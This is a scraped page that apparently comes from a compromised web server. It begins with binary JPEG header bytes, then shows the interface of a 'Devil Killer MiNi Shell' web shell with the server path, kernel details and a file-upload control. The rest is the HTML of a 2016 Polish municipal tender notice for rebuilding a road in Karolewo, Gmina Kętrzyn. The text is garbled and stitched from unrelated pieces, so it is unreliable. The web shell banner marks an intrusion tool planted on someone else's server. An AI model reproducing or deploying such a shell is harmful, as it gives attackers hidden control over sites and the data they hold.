JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/156795-N-2016.html

<p class="kh_header"><b>Kętrzyn: Przebudowa drogi gminnej nr 126029 N w miejscowości Karolewo, działka Nr 108, Gmina Kętrzyn.</b><br>
<b>Numer ogłoszenia: 156795 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej nr 126029 N w miejscowości Karolewo, działka Nr 108, Gmina Kętrzyn..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa drogi gminnej  126029 N w miejscowości
    Karolewo, działka Nr 108, Gmina Kętrzyn :

   Odcinek drogi objęty zamówieniem:  od km 0+000,00  do km 0+230,00.        

        CPV: 
               45100000-8  Przygotowanie terenu pod budowę,
               45110000-1  Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; 
                                     roboty ziemne,
               45200000-9  Roboty budowlane w zakresie wznoszenia kompletnych obiektów
                                     budowlanych lub ich części oraz roboty w zakresie inżynierii 
                                     lądowej i wodnej,
               45230000-8  Roboty budowlane w zakresie budowy rurociągów, linii komunika-
                                     cyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei;
                                     wyrównywanie terenu,
               45232130-2   Roboty budowlane w zakresie rurociągów do odprowadzania  wody
                                     burzowej ,
                45232440-8  Roboty budowlane w zakresie budowy rurociągów do odprowa-
                                     dzania ścieków
               45233140-2  Roboty drogowe 
               45233220-7  Roboty  w zakresie nawierzchni dróg


    
   
2. Opis i zakres przedmiotu zamówienia zawierają następujące załączniki, które są integralną częścią SIWZ, z zastrzeżeniem pkt 2.1 i 2.2 :
   1) projekty budowlane:
       - przebudowy drogi gminnej w miejscowości Karolewo, działka Nr 108,
       - przebudowy kanalizacji sanitarnej,
       - przebudowy kanalizacji deszczowej,
    2) przedmiar robót, 
    3) specyfikacje techniczne :
       - przebudowy drogi gminnej w miejscowości Karolewo, działka Nr 108,
       - przebudowy kanalizacji sanitarnej,
       - przebudowy kanalizacji deszczowej.

2.1 Przedmiar robót należy traktować jako opracowanie pomocnicze, niestanowiące jedynej podstawy do ustalenia ceny ofertowej.    Jeżeli  istnieją  roboty lub czynności,  które  Wykonawca  przy zachowaniu  należytej  staranności  może  przewidzieć  na  etapie  zapoznania  się  z  dokumentacją przetargową, w tym w szczególności z dokumentacją projektową, zobowiązany jest uwzględnić je w cenie ofertowej.
     Zaleca  się,  aby  Wykonawca dokonał  wizji  miejsca  realizacji  zadania  i  jego  otoczenia  w  celu  oszacowania  na  własną odpowiedzialność, na własny koszt i ryzyko, danych, jakie mogą okazać się niezbędne do przygotowania oferty i  podpisania  umowy.

2.2 Do realizacji zamówienia Wykonawca nie może stosować materiałów pochodzących           z rozbiórki (odzysku). Nawierzchnie z kostki kamiennej
należy wykonać w jednolitym szarym kolorze.
W przypadku rozbieżności w ustaleniach poszczególnych dokumentów opisujących zamówienie  należy stosować następującą kolejność  ważności tych dokumentów :
  1) niniejsza SIWZ ze wzorem umowy i ewentualnymi wyjaśnieniami zamawiającego,
  2) projekt budowlany,
  3) przedmiar robót,
  4) specyfikacja techniczna.
Nie zawarcie określonych wymagań we wszystkich dokumentach opisujących zamówienie nie będzie traktowane jako rozbieżność. Wymagania  wyszczególnione  choćby  w jednym     z  powyższych dokumentów są  obowiązujące  dla  Wykonawcy. 

3. Zamówienie zostanie zrealizowane z materiałów wykonawcy. Wykonawca ponosi  odpowiedzialność za wszystkie materiały i urządzenia używane do wykonania robót.
        Jeżeli dokumenty opisujące przedmiot zamówienia, wskazują dla niektórych materiałów   
lub urządzeń znaki towarowe lub pochodzenie, zamawiający dopuszcza składanie ofert
równoważnych, tj. z zastosowaniem  materiałów i urządzeń innych producentów , pod
warunkiem zapewnienia nie gorszych parametrów pod względem : konstrukcji, cech uży-
tkowych, charakterystyki materiałowej, parametrów technicznych, bezpieczeństwa użytko-
wania.

    Wykazanie, iż  zamienione materiały lub urządzenia posiadają nie gorsze parametry jak te
w dokumentacji przetargowej, będzie należało do obowiązków wykonawcy.

4. Do obowiązków wykonawcy, w ramach przysługującego mu wynagrodzenia, należy         w szczególności  :

   1) wykonanie  i  utrzymanie  niezbędnego zaplecza,  
   2) opracowanie projektu  organizacji  ruchu  na  czas  prowadzenia  robót    objętych 
       niniejszym zamówieniem  zgodnie z  Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu
       drogowym (tekst jedn. Dz.U. 2003 r. Nr  58  poz.515  ze  zm.),  Rozporządzeniem 
       Ministra  Infrastruktury  z  dnia  3  lipca  w  sprawie  szczegółowych warunków 
       technicznych  dla  znaków  i  sygnałów  drogowych  oraz  urządzeń  bezpieczeństwa 
       ruchu  drogowego i  warunków  ich  umieszczania  na  drogach  (Dz.U.    z  2003  r.  
       Nr  220,  poz.  2181)  oraz  Rozporządzeniem  Ministra Infrastruktury  z  dnia
       23  września  w  sprawie  szczegółowych  warunków  zarządzania  ruchem  na  drogach 
       oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. z 2003 r. Nr 177 poz.1729), 
   3)  przedstawienia  Zamawiającemu  w  ciągu  14  dni  od  podpisania  umowy  harmono-
        gramu  rzeczowo-finansowego robót, celem jego uzgodnienia; w przypadku braku
        uzgodnienia harmonogramu przez Zamawiającego Wykonawca w terminie 7 dni od
        otrzymania informacji o braku uzgodnienia harmonogramu przedłoży nowy harmono- 
        gram uwzględniający uwagi Zamawiającego, 
   4) oznakowania  miejsca  robót    zgodnie  z  zatwierdzonym  projektem  organizacji  ruchu
       i  utrzymywania  tego oznakowania w należytym stanie przez cały czas robót,  
   5) obsługa geodezyjna robót, w tym inwentaryzacja geodezyjna powykonawcza,
   6) zgłoszenie i uzgodnienie z dysponentami urządzeń obcych znajdujących się w pasie
       drogowym zasad prowadzenia robót,
   7) zabezpieczenie instalacji i urządzeń na terenie robót i w jego bezpośrednim otoczeniu
       przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, 
   8) informowanie Zamawiającego lub osoby przez niego upoważnionej o terminie wyko- 
       nania robót ulegających zakryciu,
  9) zapewnienie ciągłości ruchu publicznego na terenie budowy łącznie z jego właściwą
      organizacją; roboty  będą wykonywane  co  najwyżej  przy  częściowym  zamknięciu 
       tylko  jednego pasa ruchu,
  10) utrzymanie w okresie realizacji zamówienia istniejących obiektów na terenie budowy,
        takich jak jezdnie, zjazdy, chodniki, znaki drogowe,
  11) przekazanie Zamawiającemu na jego żądanie materiałów rozbiórkowych, a w przeciw-
        nym razie  zagospodarowanie ich we własnym zakresie, a w razie konieczności również
        zutylizowanie,
  12) transport odpadów do miejsc ich wykorzystania lub utylizacji, łącznie z kosztami
        utylizacji,
  13) uporządkowanie, po zakończeniu prac, terenu budowy oraz innych wykorzystywanych
        przez wykonawcę terenów,
  14) ponoszenie pełnej odpowiedzialności za  przestrzeganie przepisów BHP, ochronę p.poż  
        i dozór mienia na terenie budowy, jak i za wszelkie szkody powstałe w trakcie trwania
        robót   i mających związek z prowadzonymi robotami,  chyba że wyłącznie odpowie-
        dzialna za ich powstanie jest osoba trzecia, za którą Wykonawca nie ponosi odpowie-
        dzialności, 
  15) ponoszenie wyłącznej odpowiedzialności za wszelkie szkody będące następstwem
        niewykonania lub nienależytego wykonania przedmiotu umowy, 
  16) umożliwienie Zamawiającemu lub osobie upoważnionej kontroli terenu budowy w
        każdym czasie,
  17) stosowanie się do poleceń Zamawiającego lub osoby upoważnionej, zgodnych z zapi-
        sami  umowy i przepisami prawa,
  18) zapewnienie  kierowania robotami budowlanymi przez osoby posiadające stosowne
        kwalifikacje zawodowe i wymagane uprawnienia budowlane,
  19) przyjęcie odpowiedzialności materialnej za skutki finansowe z tytułu jakichkolwiek 
        roszczeń  wniesionych  przez  właścicieli  posesji  lub  budynków  sąsiadujących  z 
        terenem budowy w zakresie, w jakim Wykonawca jest za nie odpowiedzialny,  
  20) ubezpieczenie Wykonawcy   od    odpowiedzialności    cywilnej, uwzględniające szkody
        oraz następstwa nieszczęśliwych wypadków dotyczących pracowników budowlanych 
        i  osób trzecich,  a  powstałych  w  związku  z  prowadzonymi  robotami,  w  tym  także
        ruchem pojazdów mechanicznych,
  21) usunięcie na swój koszt wad i usterek stwierdzonych w okresie rękojmi za wady 
        i w okresie gwarancji jakości.

5.  Wymagany okres gwarancji jakości dla  przedmiotu zamówienia - 5 lat od odbioru
      końcowego (ostatecznego) zamówienia.

6.  Zamawiającemu przysługuje prawo wprowadzenia zmian w dokumentacji projektowej    
     i zlecenia wykonawcy wykonania robót zamiennych.  Wykonawca zobowiązany jest
    zrealizować zamówienie zgodnie ze zleconymi zmianami, jeżeli zmiany te nie powodują 
    wzrostu kosztów realizacji zamówienia.
  
7. Zamawiającemu przysługuje prawo zmniejszenia zakresu zamówienia w przypadku
    wystąpienia okoliczności uniemożliwiających realizację pełnego zakresu zamówienia lub
    uzasadniających jego zmniejszenie.

8 . Zamawiający dopuszcza możliwość  udzielenia zamówień uzupełniających, o których 
     mowa w art.67 ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 50% wartości
     zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego
     i polegających na powtórzeniu tego samego rodzaju zamówień, w szczególności polega-
     jących na wymianie sieci wodociągowej.
     Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość  udzielenia zamówień uzupełniających, o których 
     mowa w art.67 ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 50% wartości
     zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego
     i polegających na powtórzeniu tego samego rodzaju zamówień, w szczególności polega-
     jących na wymianie sieci wodociągowej.
     Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.10.00.00-8, 45.11.00.00-1, 45.20.00.00-9, 45.23.00.00-8, 45.23.21.30-2, 45.23.24.40-8, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium 
    w wysokości 20 000,- zł (słownie:  dwadzieścia tysięcy złotych) 
    
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 
ust. 6 ustawy, tj.:
   1)	pieniądzu;
   2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
   3)	gwarancjach bankowych;
   4)	gwarancjach ubezpieczeniowych;
   	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości         (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
   Wadium musi obejmować cały okres związania ofertą.
4. Wadium w pieniądzu należy wnieść przelewem  na rachunek bankowy Zamawiającego:
 Nr 71 2030 0045 1110 0000 0287 4780
      z podaniem tytułu: Wadium - przebudowa drogi gminnej 126029 N w Karolewie, działka Nr 108, Gmina Kętrzyn.
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.  Wadium wnoszone w formie innej niż pieniądz musi być nieodwołalne i gwarantować wypłatę kwoty wadium w przypadkach przewidzianych ustawą, a oryginał dokumentu stanowiącego wadium należy dołączyć do oferty.
7.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
8. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
   1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach
       określonych  w ofercie;
   2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
   3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn 
       leżących po stronie wykonawcy;
   4) jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy,
       z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których
       mowa w art. 25  ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy
       kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie
       należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której
       mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty
       złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 5  do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli wykonawca wykaże należyte wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 1 roboty budowlanej, obejmującej budowę lub przebudowę drogi, o wartości robót drogowych wraz z infrastrukturą 
techniczną nie mniejszej niż 600 000,- zł (sześćset tysięcy zł) z Vat;

w przypadku wykonawców występujących wspólnie warunek  musi zostać spełniony  przez co najmniej jednego wykonawcę spośród  wykonawców występujących wspólnie;     

      równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona
     według średniego kursu złotego w stosunku do  walut  obcych,  ogłoszonego  przez  NBP,
     obowiązującego  w  dniu,  w  którym  zamieszczono  ogłoszenie  o  niniejszym postępo-
     waniu w Biuletynie Zamówień Publicznych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 5  do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli wykonawca wykaże dysponowanie, w celu wykonania zamówienia:
- przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowla-
  nymi w specjalności drogowej lub   inne uprawnienia budowlane  umożliwiające  
  wykonywanie tych  samych czynności w aktualnym stanie prawnym, w zakresie
  odpowiednim do zakresu  zamówienia;
-przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami  budowla-
  nymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  
  wentylacyjnych,  wodociągowych i kanalizacyjnych lub   inne   uprawnienia budo-
  wlane umożliwiające wykonywanie tych samych czynności  w aktualnym stanie
  prawnym, w zakresie odpowiednim do zakresu zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 5  do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.98</li>
<li>2 - Termin realizacji - 0.02</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
